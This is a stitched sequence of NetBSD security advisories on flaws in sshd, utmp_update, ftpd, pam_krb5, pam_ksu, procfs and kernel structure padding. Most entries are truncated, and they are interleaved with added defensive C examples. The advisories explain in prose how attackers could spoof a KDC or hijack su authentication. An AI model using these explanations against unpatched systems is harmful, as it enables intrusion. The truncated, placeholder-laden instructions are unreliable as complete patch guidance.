NetBSD Security Advisory 2024-002: OpenSSH CVE-2024-6387 `regreSSHion'
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2024-002
=================================

Topic:          OpenSSH CVE-2024-6387 `regreSSHion'

Version:        NetBSD-current:         affected prior to 2024-07-02
                NetBSD 10.0:            affected
                NetBSD 9.4:             affected
                pkgsrc:                 affected prior to openssh-9.8p1

Severity:       Remote code execution in sshd(8)

Fixed:          NetBSD-current:         2024-07-01
                NetBSD-10 branch:       2024-07-01
                NetBSD-9 branch:        2024-07-01
                pkgsrc-current:         2024-07-01
                pkgsrc-2024Q2:          2024-07-02

Please note that NetBSD releases prior to 9.4 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

The sshd(8) login grace time expiry message is issued from signal
handler context, where it is not safe, and may cause heap corruption,
potentially leading to remote code execution.

This vulnerability has been assigned CVE-2024-6387.

See https://www.qualys.com/regresshion-cve-2024-6387/ for more
information.


Technical Details
=================

The sshd(8) LoginGraceTime option sets the maximum time that sshd(8)
will wait for a new connection to authenticate, to mitigate denial of
service attacks.  If set to zero, there is no maximum time.

The option is implemented in sshd(8) by a SIGALRM handler.  The SIGALRM
handler logs a message with syslog_r(3), formatted to be safe for
terminals with strnvis(3).  Both of these library routines may call
malloc(3), which is not async-signal-safe.  If the SIGALRM is delivered
while another part of sshd(8) is interrupted during a malloc(3) call
(or a related function such as calloc(3) or free(3)), this can corrupt
malloc's internal data structures, which can lead to remote code
execution.


Solutions and Workarounds
=========================

Workaround: Set

        LoginGraceTime 0

in the sshd_config(5) file.  This prevents the heap corruption
vulnerability.  However, it may allow denial of service attacks against
sshd(8) by clients that open connections and idle forever without
authenticating.

Alternative workaround: Install security/openssh from pkgsrc and switch
to the pkgsrc version.
To apply a fixed version from a releng build, fetch a fitting base.tgz
or base.tar.xz from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.SUFX
        cd /
        tar xzpf /var/tmp/base.SUFX ./usr/lib/libssh.so.46.1   # netbsd-current
        tar xzpf /var/tmp/base.SUFX ./usr/lib/libssh.so.46.1   # netbsd-10
        tar xzpf /var/tmp/base.SUFX ./usr/lib/libssh.so.34.0   # netbsd-9

with the following replacements:

        REL  = the release version you are using
        BUILD = the source date of the build. 20240702* and later will fit
        ARCH = your system's architecture
        SUFX = tgz or tar.xz depending on architecture

The following instructions describe how to upgrade your OpenSSH binaries
by updating your source tree and rebuilding and installing a new version
of libssh.

* NetBSD-current:

        Systems running NetBSD-current dated from before 2024-07-01
        should be upgraded to NetBSD-current dated 2024-07-02 or later.

        The following files/directories need to be updated from the
        netbsd-current CVS branch (aka HEAD):
                crypto/external/bsd/openssh/dist/log.c

        To update from CVS, re-build, and re-install libssh:
                # cd src
                # cvs update -d -P crypto/external/bsd/openssh/dist
                # cd crypto/external/bsd/openssh/lib
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 10.*:

        Systems running NetBSD 10.* sources dated from before 2024-07-01
        should be upgraded from NetBSD 10.* sources dated 2024-07-02 or
        later.

        The following files/directories need to be updated from the
        netbsd-10 branch:
                crypto/external/bsd/openssh/dist/log.c

        To update from CVS, re-build, and re-install libssh:
                # cd src
                # cvs update -r netbsd-10 -d -P crypto/external/bsd/openssh/dist
                # cd crypto/external/bsd/openssh/lib
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 9.*:

        Systems running NetBSD 9.* sources dated from before 2024-07-01
        should be upgraded from NetBSD 9.* sources dated 2024-07-02 or
        later.

        The following files/directories need to be updated from the
        netbsd-9 branch:
                crypto/external/bsd/openssh/dist/log.c

        To update from CVS, re-build, and re-install libssh:
                # cd src
                # cvs update -r netbsd-9 -d -P crypto/external/bsd/openssh/dist
NetBSD Security Advisory 2024-001: Inadequate validation of user-supplied hostname in utmp_update(8)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2024-001
=================================

Topic:          Inadequate validation of user-supplied hostname in
                utmp_update(8)

Version:        NetBSD-current:         affected prior to 2023-09-30
                NetBSD 10.0_RC4:        affected
                NetBSD 9.3:             affected
                NetBSD 9.2:             affected
                NetBSD 9.1:             affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             affected
                NetBSD 8.1:             affected
                NetBSD 8.0:             affected

Severity:       Possibility of injecting arbitrary characters into the
                utmp logs, including terminal escape sequences.

Fixed:          NetBSD-current:         2023-09-30
                NetBSD-10 branch:       2024-02-17
                NetBSD-9 branch:        2024-02-17
                NetBSD-8 branch:        2024-02-17

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

utmp_update(8) is a helper program that allows users to update their
utmpx(5) entries.  It did not adequately validate user-supplied data,
enabling a malicious user to inject arbitrary content into the records.


Technical Details
=================

A malicious user can inject arbitrary data into the utmpx(5) database
because the supplied hostname was not filtered.  Attackers can exploit
this to make tools that display hostnames from the utmpx(5) database,
such as w(1) or who(1), write escape sequences into the terminal of the
user invoking them.

While this vulnerability does not pose a direct threat to the system's
core operations, it can be leveraged indirectly to disrupt accurate
system logging, compromise terminal interfaces, and facilitate social
engineering attacks by displaying arbitrary content in the terminals of
unsuspecting victims.

The utmp_update(8) utility was fixed by introducing a filter which
accepts only printable characters in hostnames.


Solutions and Workarounds
=========================

It is suggested to install the new version of the utmp_update(8)
utility.
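The fix described above is a printable-character filter on the hostname before it reaches the record. As an added example (not NetBSD's utmp_update(8) code), the block below shows that filter, hostname_is_clean(), and the complementary display-side defence, sanitize_for_terminal(), which a viewer such as who(1) could apply so that a record that slipped past the writer still cannot drive the terminal. UT_HOSTSIZE is an assumed field limit; NetBSD's real strnvis(3) does the display-side escaping more thoroughly than the '?' replacement used here.

```c
/*
 * Added example, not NetBSD's utmp_update(8) or who(1) code: reject
 * non-printable bytes in a user-supplied hostname at write time, and
 * neutralise them at display time.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define UT_HOSTSIZE 256		/* assumed limit standing in for the utmpx field */

/* Is c printable 7-bit ASCII?  isprint() is given the unsigned value, and
 * anything above 0x7e (DEL and all 8-bit bytes) is refused as well, so
 * ESC (0x1b), CSI introducers, BEL and multibyte sequences all fail. */
static int
printable_ascii(unsigned char c)
{
	return c <= 0x7e && isprint(c);
}

/* Write-side filter: 1 if host is non-empty, fits the field, and consists
 * only of printable ASCII; 0 otherwise. */
int
hostname_is_clean(const char *host)
{
	size_t i, n = strnlen(host, UT_HOSTSIZE + 1);

	if (n == 0 || n > UT_HOSTSIZE)
		return 0;
	for (i = 0; i < n; i++)
		if (!printable_ascii((unsigned char)host[i]))
			return 0;
	return 1;
}

/* Display-side defence: copy in to out (at most outlen-1 bytes plus NUL),
 * replacing every non-printable byte with '?'.  Returns the number of
 * bytes replaced, or -1 if outlen is 0. */
int
sanitize_for_terminal(const char *in, char *out, size_t outlen)
{
	size_t i;
	int replaced = 0;

	if (outlen == 0)
		return -1;
	for (i = 0; in[i] != '\0' && i < outlen - 1; i++) {
		unsigned char c = (unsigned char)in[i];
		if (printable_ascii(c)) {
			out[i] = in[i];
		} else {
			out[i] = '?';
			replaced++;
		}
	}
	out[i] = '\0';
	return replaced;
}
```

A record that fails hostname_is_clean() should be refused outright rather than stored sanitized: the writer is unprivileged user input, while the reader is every other user's terminal.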
To apply a fixed version from a releng build, fetch a fitting base.tgz
from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz
        cd /
        tar xzpf /var/tmp/base.tgz ./usr/libexec/utmp_update

with the following replacements:

        REL  = the release version you are using
        BUILD = the source date of the build. %DATE%* and later will fit
        ARCH = your system's architecture

The following instructions describe how to upgrade your utmp_update(8)
binaries by updating your source tree and rebuilding and installing a
new version of utmp_update(8).

* NetBSD-current:

        Systems running NetBSD-current dated from before 2023-09-30
        should be upgraded to NetBSD-current dated 2023-10-01 or later.

        The following files/directories need to be updated from the
        netbsd-current CVS branch (aka HEAD):
                src/libexec/utmp_update/utmp_update.c

        To update from CVS, re-build, and re-install utmp_update(8):
                # cd src
                # cvs update -d -P libexec/utmp_update/
                # cd libexec/utmp_update/
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 9.*:

        Systems running NetBSD 9.* sources dated from before 2024-02-17
        should be upgraded from NetBSD 9.* sources dated 2024-02-18 or
        later.

        The following files/directories need to be updated from the
        netbsd-9 branch:
                path/to/files

        To update from CVS, re-build, and re-install utmp_update(8):
                # cd src
                # cvs update -r netbsd-9 -d -P libexec/utmp_update/
                # cd libexec/utmp_update/
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 8.*:

        Systems running NetBSD 8.* sources dated from before 2024-02-17
        should be upgraded from NetBSD 8.* sources dated 2024-02-18 or
        later.

        The following files/directories need to be updated from the
        netbsd-8 branch:
                path/to/files

        To update from CVS, re-build, and re-install utmp_update(8):
                # cd src
                # cvs update -r netbsd-8 -d -P libexec/utmp_update/
                # cd libexec/utmp_update/
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install


Thanks To
=========

Adam Simuntis (https://twitter.com/adamsimuntis) for finding and
reporting the issue.

Christos Zoulas (christos@) for fixing the issue.


Revision History
================
NetBSD Security Advisory 2023-007: multiple vulnerabilities in ftpd(8)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2023-007
=================================

Topic:          multiple vulnerabilities in ftpd(8)

Version:        NetBSD-current:         affected prior to 2023-10-01
                NetBSD 10.0_BETA:       affected prior to 2023-10-01
                NetBSD 9.3:             affected
                NetBSD 9.2:             affected
                NetBSD 9.1:             affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             affected
                NetBSD 8.1:             affected
                NetBSD 8.0:             affected
                tnftpd:                 prior to tnftpd-20231001

Severity:       Remote unauthenticated attacker may get a directory
                listing; potential buffer overflows.

Fixed:          NetBSD-current:         2023-09-30
                NetBSD-10 branch:       2023-10-02
                NetBSD-9 branch:        2023-10-02
                NetBSD-8 branch:        2023-10-03
                tnftpd:                 tnftpd-20231001

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A vulnerability in the NetBSD FTP server allows unauthenticated users
to execute the MLST and MLSD commands.  This can lead to information
leakage: an unauthorized party may be able to download the listing of
the current ftpd(8) directory.

This vulnerability has been assigned CVE-2023-45198.

Additionally, a potential buffer overflow in count_users() and reads
outside of allocated memory due to the wrong struct type being used in
the pam_set_item() call have been identified.


Technical Details
=================

The NetBSD FTP server allowed unauthenticated users to execute the MLST
and MLSD commands without requiring proper authentication.  This could
enable unauthorized users to retrieve directory listings and
information about files on the server, potentially leading to an
information leak.  It should be noted that although MLST and MLSD can
be executed by an unauthenticated user, they only allow the attacker to
operate on the current directory of the ftpd(8) process.

Another issue is associated with the count_users() function, which
potentially used uninitialized memory.  If the file was previously
empty, the pids table used by the daemon is not set; the code however
used pids[0], which is uninitialized in this case.  In some scenarios
this may propagate a garbage value from pids[0] to the file and cause
writes outside of allocated memory.

A further weakness was identified in the PAM integration.  pam_set_item
used with the PAM_SOCKADDR option expects a sockaddr_storage structure.
Instead, the internal struct sockinet was used.  Because its length is
shorter than sockaddr_storage, libpam also copied memory outside the
sockinet struct.


Solutions and Workarounds
=========================

As a temporary workaround, ftpd(8) might be disabled.

To apply a fixed version from a releng build, fetch a fitting base.tgz
from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz
        tar -C / -xzpf /var/tmp/base.tgz ./usr/libexec/ftpd

with the following replacements:

        REL  = the release version you are using
        BUILD = the source date of the build. %DATE%* and later will fit
        ARCH = your system's architecture

The following instructions describe how to upgrade your ftpd(8)
binaries by updating your source tree and rebuilding and installing a
new version of ftpd(8).

* NetBSD-current:

        Systems running NetBSD-current dated from before 2023-09-30
        should be upgraded to NetBSD-current dated 2023-10-01 or later.

        The following files/directories need to be updated from the
        netbsd-current CVS branch (aka HEAD):
                src/libexec/ftpd

        To update from CVS, re-build, and re-install ftpd(8):
                # cd src
                # cvs update -d -P libexec/ftpd
                # cd libexec/ftpd
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 9.*:

        Systems running NetBSD 9.* sources dated from before 2023-10-02
        should be upgraded from NetBSD 9.* sources dated 2023-10-03 or
        later.

        The following files/directories need to be updated from the
        netbsd-9 branch:
                src/libexec/ftpd

        To update from CVS, re-build, and re-install ftpd(8):
                # cd src
                # cvs update -r netbsd-9 -d -P libexec/ftpd
                # cd libexec/ftpd
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 8.*:

        Systems running NetBSD 8.* sources dated from before 2023-10-03
        should be upgraded from NetBSD 8.* sources dated 2023-10-04
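CVE-2023-45198 is a missing authentication check on two listing verbs. The structural defence against that class of bug is to record the authentication requirement in the command table and enforce it once in the dispatcher, so a verb cannot become reachable before login by omission. The block below is an added example of that pattern, not NetBSD ftpd(8) code; the five-verb table, the reply codes and the session struct are constructed for illustration, and the handlers do nothing but return the reply code a server would send.

```c
/*
 * Added example, not NetBSD ftpd(8) code: per-verb authentication
 * requirements kept in the command table and checked in one place.
 */
#include <stdio.h>
#include <string.h>
#include <strings.h>

struct session {
	int logged_in;		/* set once USER/PASS has succeeded */
	const char *cwd;	/* directory a listing would expose */
};

struct ftp_cmd {
	const char *verb;
	int needs_auth;		/* 1: refuse with 530 before login */
	int (*handler)(struct session *, const char *arg);	/* returns reply code */
};

/* Constructed handlers: each returns the reply code it would emit. */
static int cmd_user(struct session *s, const char *a) { (void)s; (void)a; return 331; }
static int cmd_pass(struct session *s, const char *a) { (void)a; s->logged_in = 1; return 230; }
static int cmd_quit(struct session *s, const char *a) { (void)s; (void)a; return 221; }
static int cmd_mlst(struct session *s, const char *a) { (void)s; (void)a; return 250; }
static int cmd_mlsd(struct session *s, const char *a) { (void)s; (void)a; return 150; }

/* Constructed table; a real server has many more verbs.  Listing verbs
 * are marked authenticated-only, which is the property that was missing. */
static const struct ftp_cmd cmdtab[] = {
	{ "USER", 0, cmd_user },
	{ "PASS", 0, cmd_pass },
	{ "QUIT", 0, cmd_quit },
	{ "MLST", 1, cmd_mlst },
	{ "MLSD", 1, cmd_mlsd },
};

/*
 * Dispatch one command line ("VERB [arg]\r\n").  Returns the FTP reply
 * code: 530 when an authenticated-only verb arrives before login, 500
 * for unknown or malformed verbs, otherwise whatever the handler returns.
 */
int
ftp_dispatch(struct session *s, const char *line)
{
	char verb[5];
	const char *arg;
	size_t i, n = strcspn(line, " \r\n");

	if (n == 0 || n >= sizeof(verb))
		return 500;
	memcpy(verb, line, n);
	verb[n] = '\0';
	arg = (line[n] == ' ') ? line + n + 1 : "";

	for (i = 0; i < sizeof(cmdtab) / sizeof(cmdtab[0]); i++) {
		if (strcasecmp(verb, cmdtab[i].verb) != 0)
			continue;
		/* The single gate every verb passes through. */
		if (cmdtab[i].needs_auth && !s->logged_in)
			return 530;	/* "Please login with USER and PASS." */
		return cmdtab[i].handler(s, arg);
	}
	return 500;
}
```

With the flag in the table, adding a verb and forgetting to mark it is a visible one-line omission at the definition site rather than a missing branch buried in a handler.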
NetBSD Security Advisory 2023-006: KDC-spoofing in pam_krb5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2023-006
=================================

Topic:          KDC-spoofing in pam_krb5

Version:        NetBSD-current:         affected prior to 2023-06-20
                NetBSD 10.0_BETA:       affected prior to 2023-06-21
                NetBSD 9.3:             affected
                NetBSD 9.2:             affected
                NetBSD 9.1:             affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             affected
                NetBSD 8.1:             affected
                NetBSD 8.0:             affected

Severity:       Remote attacker may be able to log in as any user

Fixed:          NetBSD-current:         2023-06-20
                NetBSD-10 branch:       2023-06-21
                NetBSD-9 branch:        2023-06-21
                NetBSD-8 branch:        2023-06-21

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

On a NetBSD system with:

- ftpd, sshd, or some other network services enabled with default
  configuration, and
- /etc/krb5.conf created (possibly an empty file),

an adversary on the network can log in as any user via pam_krb5 by
spoofing a Kerberos KDC (Key Distribution Center) on the network,
bypassing Kerberos's normal cryptographic verification methods.

NetBSD installations without /etc/krb5.conf (the default) are not
affected.

This vulnerability has been assigned CVE-2023-3326.


Technical Details
=================

Normally, Kerberos works like this:

1. An organization is named by a realm like EXAMPLE.COM and has a
   server called a KDC storing secrets shared with all users and
   services in the organization.

2. Each user and service is identified by a `principal name' like
   u...@example.com or imap/mail.example@example.com.

3. Each principal (user or service) has a secret shared with the KDC:
   . passwords, for users;
   . random keys, for services, stored in a file called a `keytab'
     with the service.

4. To log in as a user, you run `kinit u...@example.com' and enter
   your password.  kinit(1) talks to the KDC to get a `ticket-granting
   ticket' (tgt) which is typically good for 10h or 24h, so you only
   have to do this once per day to get access to any services as a
   single-sign-on (SSO) system.

   In this process, the KDC and kinit(1) use your password in a
   cryptographic protocol to authenticate one another -- if you enter
   the wrong password, or if the KDC is actually spoofed and doesn't
   know your password, kinit(1) fails to obtain a tgt.

5. To use a service like IMAP at mail.example.com:
   (a) your mail reader requests a service ticket for
       imap/mail.example@example.com from the KDC using the tgt,
   (b) your mail reader sends the service ticket to mail.example.com,
   (c) mail.example.com uses its keytab to verify the service ticket
       came from the legitimate KDC before letting you read your mail.

pam_krb5 is an authentication module that verifies a password on
behalf of login programs like sshd and xdm.  It works by effectively
running kinit(1) with the password, and getting a tgt from the KDC, as
a way to verify the password.

- For local logins, like xdm, pam_krb5 incorporates the single-sign-on
  aspect of Kerberos into the local login prompt, so users can proceed
  to use the tickets obtained by pam_krb5 for applications in their
  login session.

- For logins from remote users, like sshd, pam_krb5 serves as a
  fallback for users who are familiar with passwords, but are
  unfamiliar with Kerberos or the normal kinit(1) path.  (Note:
  pam_krb5 is not for normal Kerberos authentication in sshd -- for
  that, you must set `GSSAPIAuthentication yes' in
  /etc/ssh/sshd_config.)

If there is a keytab, pam_krb5 also uses the tgt to get a service
ticket and verifies the service ticket with the keytab.  But without a
keytab, the only way pam_krb5 can verify the KDC's response and get a
tgt is with the password, and yet pam_krb5's job is to verify the
password with a tgt.  If both the password _and_ the KDC are controlled
by an adversary, the adversary can provide a password that the
adversary's spoofed KDC will return a valid tgt for.  Currently,
without a keytab, pam_krb5 is vulnerable to this attack.

pam_krb5 is not necessary for you to use Kerberos just for client-side
SSO, but to use that, you need to create an /etc/krb5.conf (which may
be empty) before kinit(1) and any kerberized client software like
Thunderbird or Firefox will use Kerberos.  Creating /etc/krb5.conf --
even an empty file -- has the side effect of enabling pam_krb5, which
is on by default in /etc/pam.d for system, ftpd, display_manager, and
sshd.  Even if /etc/krb5.conf is empty and doesn't specify a default
realm or KDC, pam_krb5 will attempt to discover the realm and KDC
NetBSD Security Advisory 2023-005: su(1) bypass via pam_ksu(8)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2023-005
=================================

Topic:          su(1) bypass via pam_ksu(8)

Version:        NetBSD-current:         affected prior to 2023-06-20
                NetBSD 10.0_BETA:       affected prior to 2023-06-21
                NetBSD 9.3:             affected
                NetBSD 9.2:             affected
                NetBSD 9.1:             affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             affected
                NetBSD 8.1:             affected
                NetBSD 8.0:             affected

Severity:       Local privilege escalation

Fixed:          NetBSD-current:         2023-06-20
                NetBSD-10 branch:       2023-06-21
                NetBSD-9 branch:        2023-06-21
                NetBSD-8 branch:        2023-06-21

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An unprivileged user can bypass su(1) security checks by exploiting a
flaw in the PAM module pam_ksu(8), which is supposed to authenticate
the user by checking their Kerberos password.


Technical Details
=================

On a system configured to use Kerberos, pam_ksu(8) is supposed to
authenticate an unprivileged user calling su(1) by prompting for the
user's Kerberos password, obtaining Kerberos tickets from the Kerberos
realm's KDC with the user's password, and verifying the user's tickets
with a secret keytab.

On a system not configured to use Kerberos, pam_ksu(8) is supposed to
fail harmlessly when it sees that /etc/krb5.conf does not exist.

However, the update to Heimdal 7.1 inadvertently lost a set-user-id
context check that pam_ksu(8) relied on to sanitize its context, and so
it would consult ~/.krb5/config for Kerberos configuration, whether or
not /etc/krb5.conf exists, in spite of being in a dangerous set-user-id
context.

This allows the user calling su(1) to completely control pam_ksu's
logic, by specifying a default realm, a KDC for the realm, and the
location of the keytab that pam_ksu(8) is to consult for a secret key
shared with the KDC that it uses to verify the user's tickets.  By
simply running a KDC, possibly even on the same host on a nonstandard
port number, the user calling su(1) can convince pam_ksu(8) to succeed.
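The lost check was a decision about which configuration sources a set-user-id process may trust. As an added example (not NetBSD's pam_ksu(8) or Heimdal code), the block below makes that decision explicit: in a set-id context only /etc/krb5.conf is consulted, and a missing or empty file must fail closed rather than fall through to anything the invoking user controls. The setugid state is passed as a parameter so the policy can be exercised directly; the krb5_config_search_path() name, MAX_CONF and the $KRB5_CONFIG handling are this example's own. On NetBSD the authoritative test is issetugid(2); the in_setugid_context() fallback shown only compares real and effective ids and is weaker.

```c
/*
 * Added example, not NetBSD's pam_ksu(8) or Heimdal code: choose which
 * Kerberos configuration files a privileged helper may read.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MAX_CONF 4
#define SYSTEM_KRB5_CONF "/etc/krb5.conf"

/*
 * Fill paths[] with the configuration files to consult, in order, and
 * return the count.  home and env_krb5_config are the values of $HOME
 * and $KRB5_CONFIG as seen by the process (either may be NULL).
 *
 * setugid != 0 means the process runs with privileges its caller does
 * not have (su(1) via PAM is the case in the advisory).  Then the only
 * acceptable source is the system file: a realm, KDC or keytab named by
 * the caller would let the caller pick who "verifies" their ticket.
 */
int
krb5_config_search_path(int setugid, const char *home,
    const char *env_krb5_config, const char *paths[MAX_CONF])
{
	static char userconf[1024];
	int n = 0;

	if (setugid) {
		paths[n++] = SYSTEM_KRB5_CONF;
		return n;	/* fail closed if this file is absent or empty */
	}

	/* Ordinary, unprivileged process: user-controlled sources are fine. */
	if (env_krb5_config != NULL && *env_krb5_config != '\0')
		paths[n++] = env_krb5_config;
	if (home != NULL && *home != '\0') {
		snprintf(userconf, sizeof(userconf), "%s/.krb5/config", home);
		paths[n++] = userconf;
	}
	paths[n++] = SYSTEM_KRB5_CONF;
	return n;
}

/*
 * Portable approximation of issetugid(2): true if the real and effective
 * ids differ.  issetugid(2) is stronger (it also remembers a set-id exec
 * earlier in the process's history, which this cannot), so prefer it
 * wherever it exists.
 */
int
in_setugid_context(void)
{
	return getuid() != geteuid() || getgid() != getegid();
}
```

The ordering for the unprivileged case also matters in practice: an environment override first, then the per-user file, then the system default, which is the precedence Kerberos clients conventionally apply.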
Solutions and Workarounds
=========================

Workaround: Disable pam_ksu(8) in /etc/pam.d/su by adding a single `#'
character at the start of the line where pam_ksu appears, in order to
comment it out.

To apply a fixed version from a releng build, fetch a fitting base.tgz
or base.tar.xz from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tar.xz
        cd /
        tar xzpf /var/tmp/base.tar.xz ./usr/lib/security/pam_ksu.so.4

with the following replacements:

        REL  = the release version you are using
        BUILD = the source date of the build. 20230621* and later will fit
        ARCH = your system's architecture

The following instructions describe how to upgrade your pam_ksu(8)
binaries by updating your source tree and rebuilding and installing a
new version of pam_ksu(8).

* NetBSD-current:

        Systems running NetBSD-current dated from before 2023-06-21
        should be upgraded to NetBSD-current dated 2023-06-22 or later.

        The following files/directories need to be updated from the
        netbsd-current CVS branch (aka HEAD):
                lib/libpam/modules/pam_ksu/pam_ksu.c

        To update from CVS, re-build, and re-install pam_ksu:
                # cd src
                # cvs update -d -P lib/libpam/modules/pam_ksu/pam_ksu.c
                # cd lib/libpam/modules/pam_ksu
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 10.*:

        Systems running NetBSD 10.* sources dated from before 2023-06-21
        should be upgraded from NetBSD 10.* sources dated 2023-06-22 or
        later.

        The following files/directories need to be updated from the
        netbsd-10 branch:
                lib/libpam/modules/pam_ksu/pam_ksu.c

        To update from CVS, re-build, and re-install pam_ksu:
                # cd src
                # cvs update -r netbsd-10 -d -P lib/libpam/modules/pam_ksu/pam_ksu.c
                # cd lib/libpam/modules/pam_ksu
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 9.*:

        Systems running NetBSD 9.* sources dated from before 2023-06-21
        should be upgraded from NetBSD 9.* sources dated 2023-06-22 or
        later.

        The following files/directories need to be updated from the
        netbsd-9 branch:
                lib/libpam/modules/pam_ksu/pam_ksu.c

        To update from CVS, re-build, and re-install pam_ksu:
                #
NetBSD Security Advisory 2023-004: procfs environ exposure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2023-004
=================================

Topic:          procfs environ exposure

Version:        NetBSD-current:         affected prior to 9.99.78
                NetBSD 10.0_BETA:       unaffected
                NetBSD 9.3:             unaffected
                NetBSD 9.2:             affected
                NetBSD 9.1:             affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             unaffected
                NetBSD 8.1:             unaffected
                NetBSD 8.0:             unaffected

Severity:       Secret disclosure across privilege boundaries

Fixed:          NetBSD-current:         2020-12-28
                NetBSD-10 branch:       N/A
                NetBSD-9 branch:        2022-06-17
                NetBSD-8 branch:        N/A

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

/proc/N/environ was world-readable, enabling anyone to read other
processes' environments even across privilege boundaries.  This can
expose secrets, since the process environment is often used to hold
things like secret access keys.


Technical Details
=================

When procfs is mounted at /proc, the process environment (environ(7))
for the process with pid N is exposed as /proc/N/environ.

The process environment is often used to transmit secrets such as
secret access keys:

https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html

Normally a process's environment is exposed only to that process and to
other processes with the same privileges -- one user cannot read the
environment of another user's process, for example with the `-e' option
to ps(1).

However, procfs exposed /proc/N/environ with group and other read
permission, allowing any user's process on the system to read any other
process's environment, potentially disclosing secrets across privilege
boundaries.


Solutions and Workarounds
=========================

Workaround: Avoid mounting procfs.

If you need to mount procfs, update the kernel to a fixed version and
reboot.

There are pre-built binaries for all architectures and NetBSD versions
at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/

For example you can find the standard GENERIC kernel for NetBSD-9/amd64
at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz

Alternatively, to build from source for all NetBSD versions, you need to
obtain fixed kernel sources, rebuild and install the new kernel, and
reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.  The
following instructions briefly summarize how to upgrade your kernel.
In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/miscfs/procfs/procfs_vfsops.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html


Thanks To
=========

Maya Rashish for finding the bug.


Revision History
================

2023-06-28      Initial release


More Information
================

Advisories may be updated as new information becomes available.  The
most recent version of this advisory (PGP signed) can be found at
        https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2023-NNN.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2023, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2023-004.txt,v 1.1 2023/06/28 15:33:18 christos Exp $
NetBSD Security Advisory 2023-003: Structure padding memory disclosures
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2023-003
=================================

Topic:          Structure padding memory disclosures

Version:        NetBSD-current:         affected prior to 2021-09-09
                NetBSD 10.0_BETA:       unaffected
                NetBSD 9.3:             unaffected
                NetBSD 9.2:             affected
                NetBSD 9.1:             affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             affected
                NetBSD 8.1:             affected
                NetBSD 8.0:             affected

Severity:       Kernel memory disclosure

Fixed:          NetBSD-current:         2021-09-09
                NetBSD-10 branch:       N/A
                NetBSD-9 branch:        2022-08-03
                NetBSD-8 branch:        2023-06-21

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Many system calls can disclose kernel memory due to structure padding.


Technical Details
=================

Many system calls that return structured data initialized only the
named fields of those structures, leaving uninitialized bytes where
the compiler had added padding for alignment purposes.  These
uninitialized bytes contain whatever kernel stack data was there
before, and were copied to userland along with the fields.


Solutions and Workarounds
=========================

There are pre-built binaries for all architectures and NetBSD versions
at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/

For example you can find the standard GENERIC kernel for NetBSD-9/amd64
at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz

Alternatively, to build from source for all NetBSD versions, you need to
obtain fixed kernel sources, rebuild and install the new kernel, and
